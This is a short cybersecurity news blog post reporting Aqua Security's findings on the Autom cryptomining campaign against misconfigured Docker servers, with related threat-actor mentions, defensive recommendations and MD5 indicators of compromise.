According to researchers from DevSecOps and cloud security firm Aqua Security, who have been tracking the malware operation for the past three years, 84 attacks against its honeypot servers have been recorded to date, four of which occurred in 2021. Nonetheless, 125 attacks have been observed in the wild in the third quarter of 2021 alone, indicating that the attacks have not reduced.

Initial attacks involved running a vanilla image named “alpine:latest” and executing a malicious command, which resulted in the download of a shell script named “autom.sh.”

Researchers reported that ,”Adversaries frequently use vanilla images along with malicious commands to perform their attacks because most organisations trust and allow the use of official images, The malicious command that was added to the official image to carry out the attack has barely changed over the years. The primary distinction is the server from which the shell script autom.sh was obtained.”

Malware campaigns to hijack computers and mine cryptocurrencies have been dominated by multiple threat actors, such as Kinsing, which has been discovered scanning the internet for misconfigured Docker servers in order to break into the unprotected hosts and install a previously unknown coin miner strain.

Furthermore, TeamTNT has been observed attacking unsecured Redis database servers, Alibaba Elastic Computing Service (ECS) instances, exposed Docker APIs, and vulnerable Kubernetes clusters in order to execute malicious code with root privileges on the targeted hosts as well as deploy cryptocurrency-mining payloads and credential stealers. Docker Hub accounts were used to host malicious images, which were then used to distribute cryptocurrency miners.

Sophos senior threat researcher Sean Gallagher observed in an analysis of a Tor2Mine mining campaign, which involves the use of a PowerShell script to disable malware protection, execute a miner payload, and harvest Windows credentials. “Miners are a low-risk way for cybercriminals to turn a vulnerability into digital cash, with competing miners discovering the same vulnerable servers posing the greatest risk to their cash flow.

Security flaws in the Log4j logging library, as well as newly discovered vulnerabilities in Atlassian Confluence, F5 BIG-IP, VMware vCenter, and Oracle WebLogic Servers, have been exploited in recent weeks to take over machines and mine cryptocurrencies, a practise known as cryptojacking. QNAP, a manufacturer of network-attached storage (NAS) appliances, issued a warning earlier this month about cryptocurrency mining malware targeting its devices, which could consume up to 50% of total CPU usage.

Finally the researchers concluded that ,” The Autom campaign demonstrates that attackers are becoming more sophisticated, constantly improving their techniques and ability to avoid detection by security solutions,” . To defend against these threats, it is recommended that suspicious container activity be monitored, dynamic image analysis be performed, and environments be routinely scanned for misconfiguration issues.

Indicators of Compromise

Autom.sh

  • Md5 c5968e2332b488076f592535c0be2473
  • Md5 87e4701ccb615adc2abc82d9282d65a1
  • Md5 87e4701ccb615adc2abc82d9282d65a1

log_rotate_bin

  • Md5 fb1fde1f28b2743b0f4cbb60609df95a
  • Md5 1a882366d180331e5ffcb973719312d9
  • Md5 ced5e2d876e8264beeade2efca075f09

–-For more Cyber security news in crisp content . Please follow our site via twitter handle @cyberworkx1, Linkedin handle @linkedin

Published by shamili0508

Leave a Reply

Please log in using one of these methods to post your comment:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s